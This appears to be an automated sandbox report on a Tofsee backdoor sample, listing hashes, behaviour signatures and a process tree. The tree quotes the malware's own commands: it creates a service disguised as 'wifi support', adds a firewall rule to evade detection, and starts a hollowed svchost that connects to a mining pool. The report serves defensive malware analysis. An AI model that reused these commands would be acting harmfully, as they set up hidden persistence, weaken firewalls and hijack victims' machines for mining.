Overview

overview

10

Static

static

c1567cb139...f6.exe

windows7_x64

10

c1567cb139...f6.exe

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    14-11-2020 18:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c1567cb139d3b8cff3f496db92e0fcb186408e940d51c8cc975d939f1212d5f6.exe

  • Size

    11.3MB

  • MD5

    25c0ecfe708eabf65b3329c261f4ea4c

  • SHA1

    76f921182a5262fbfc9688b2cd991ab18cb1fa26

  • SHA256

    c1567cb139d3b8cff3f496db92e0fcb186408e940d51c8cc975d939f1212d5f6

  • SHA512

    09aac55683604e59af43c698f4ddbaec9c61b7e274c13b1571c9ed07086e3e27f3512a4db6ba5c9a819419a5e357c167773f195f6d7bd93cd0bad515348b604e

Score
10/10
tofseeevasionpersistencetrojan

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 6 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c1567cb139d3b8cff3f496db92e0fcb186408e940d51c8cc975d939f1212d5f6.exe
    "C:\Users\Admin\AppData\Local\Temp\c1567cb139d3b8cff3f496db92e0fcb186408e940d51c8cc975d939f1212d5f6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1804
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txiazdzj\
      2⤵
        PID:1776
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\oaznyiqk.exe" C:\Windows\SysWOW64\txiazdzj\
        2⤵
          PID:1404
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create txiazdzj binPath= "C:\Windows\SysWOW64\txiazdzj\oaznyiqk.exe /d\"C:\Users\Admin\AppData\Local\Temp\c1567cb139d3b8cff3f496db92e0fcb186408e940d51c8cc975d939f1212d5f6.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1640
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description txiazdzj "wifi internet conection"
            2⤵
              PID:1452
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start txiazdzj
              2⤵
                PID:1008
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                • Modifies service
                PID:1280
            • C:\Windows\SysWOW64\txiazdzj\oaznyiqk.exe
              C:\Windows\SysWOW64\txiazdzj\oaznyiqk.exe /d"C:\Users\Admin\AppData\Local\Temp\c1567cb139d3b8cff3f496db92e0fcb186408e940d51c8cc975d939f1212d5f6.exe"
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1092
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                2⤵
                • Deletes itself
                • Drops file in System32 directory
                • Modifies service
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:1112
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:608

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\oaznyiqk.exe
              MD5

              24ca7f0e87f107520c3ec448807a4d3a

              SHA1

              da15c78eeddaab8e2e4ccb53d9dbe3cce10f78dc

              SHA256

              3304fc39474707506da36b8b132b89511f6bfc2e8ab16b3610d64a170d5e1626

              SHA512

              aca343c36870a136757ed58eb25f0e6fc6d0cf1701dc94c719356a4274a5a696a0e6d5a371c244bfeaa686023a4773b7c4623162123fedfcbb51638f269f122b

              Download Submit

            • C:\Windows\SysWOW64\txiazdzj\oaznyiqk.exe
              MD5

              24ca7f0e87f107520c3ec448807a4d3a

              SHA1

              da15c78eeddaab8e2e4ccb53d9dbe3cce10f78dc

              SHA256

              3304fc39474707506da36b8b132b89511f6bfc2e8ab16b3610d64a170d5e1626

              SHA512

              aca343c36870a136757ed58eb25f0e6fc6d0cf1701dc94c719356a4274a5a696a0e6d5a371c244bfeaa686023a4773b7c4623162123fedfcbb51638f269f122b

              Download Submit

            • memory/608-24-0x000000000024259C-mapping.dmp

              Download

            • memory/608-21-0x00000000001B0000-0x00000000002A1000-memory.dmp

              Filesize

              964KB

              Download

            • memory/608-22-0x00000000001B0000-0x00000000002A1000-memory.dmp

              Filesize

              964KB

              Download

            • memory/1008-7-0x0000000000000000-mapping.dmp

              Download

            • memory/1092-11-0x0000000000B80000-0x0000000000B91000-memory.dmp

              Filesize

              68KB

              Download

            • memory/1092-10-0x000000000068B000-0x000000000068C000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1112-16-0x0000000000210000-0x0000000000216000-memory.dmp

              Filesize

              24KB

              Download

            • memory/1112-19-0x0000000005870000-0x0000000005C7B000-memory.dmp

              Filesize

              4.0MB

              Download

            • memory/1112-20-0x00000000004A0000-0x00000000004A7000-memory.dmp

              Filesize

              28KB

              Download

            • memory/1112-18-0x0000000000450000-0x0000000000455000-memory.dmp

              Filesize

              20KB

              Download

            • memory/1112-12-0x00000000000C0000-0x00000000000D5000-memory.dmp

              Filesize

              84KB

              Download

            • memory/1112-13-0x00000000000C9A6B-mapping.dmp

              Download

            • memory/1112-15-0x0000000001D40000-0x0000000001F4F000-memory.dmp

              Filesize

              2.1MB

              Download

            • memory/1112-17-0x0000000000380000-0x0000000000390000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1280-9-0x0000000000000000-mapping.dmp

              Download

            • memory/1404-3-0x0000000000000000-mapping.dmp

              Download

            • memory/1452-6-0x0000000000000000-mapping.dmp

              Download

            • memory/1640-5-0x0000000000000000-mapping.dmp

              Download

            • memory/1776-2-0x0000000000000000-mapping.dmp

              Download

            • memory/1804-0-0x000000000096B000-0x000000000096C000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1804-1-0x0000000001E50000-0x0000000001E61000-memory.dmp

              Filesize

              68KB

              Download